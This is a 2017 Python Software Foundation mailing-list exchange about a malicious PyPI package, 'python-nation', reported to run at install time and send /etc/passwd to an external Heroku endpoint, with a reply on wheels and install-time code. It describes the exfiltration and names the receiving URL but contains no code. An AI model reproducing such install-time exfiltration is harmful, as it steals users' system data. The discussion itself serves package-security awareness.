> On May 4, 2017, at 4:41 PM, Bruno Rocha <rochacbr...@gmail.com> wrote:
> Hi,
> I just read this on reddit[0], a thread asking if PyPI packages are audited 
> and somebody pointed the `python-nation`[1] which is a harmful and useless 
> module, installing itself and sending the `/etc/passwd` content to external 
> endpoint.
> The app receiving the data is hosted at http://python-nation.herokuapp.com
> and as the PSF mission [2] says
> The mission of the Python Software Foundation is to promote, protect, and 
> advance the Python programming language
> I wonder if there are some workgroup at PSF to handle this? and not only the 
> specific case of `python-nation` which should be deleted and the user banned 
> maybe, But also to handle the audit of other packages?
> [0] 
> https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/
> [1] 
> https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/dh4uyf8/
> [2] https://www.python.org/psf/mission/

Specifically re: the vector of running code at install time, wheels can help 
with this though I don't think there is a good way to tell pip to ignore 
non-wheel builds. But even then, the whole point is that you're downloading 
code from the internet :) If you want to discuss this further I recommend the 
distutils-sig mailing list.


Attachment: signature.asc
Description: Message signed with OpenPGP

PSF-Community mailing list

Reply via email to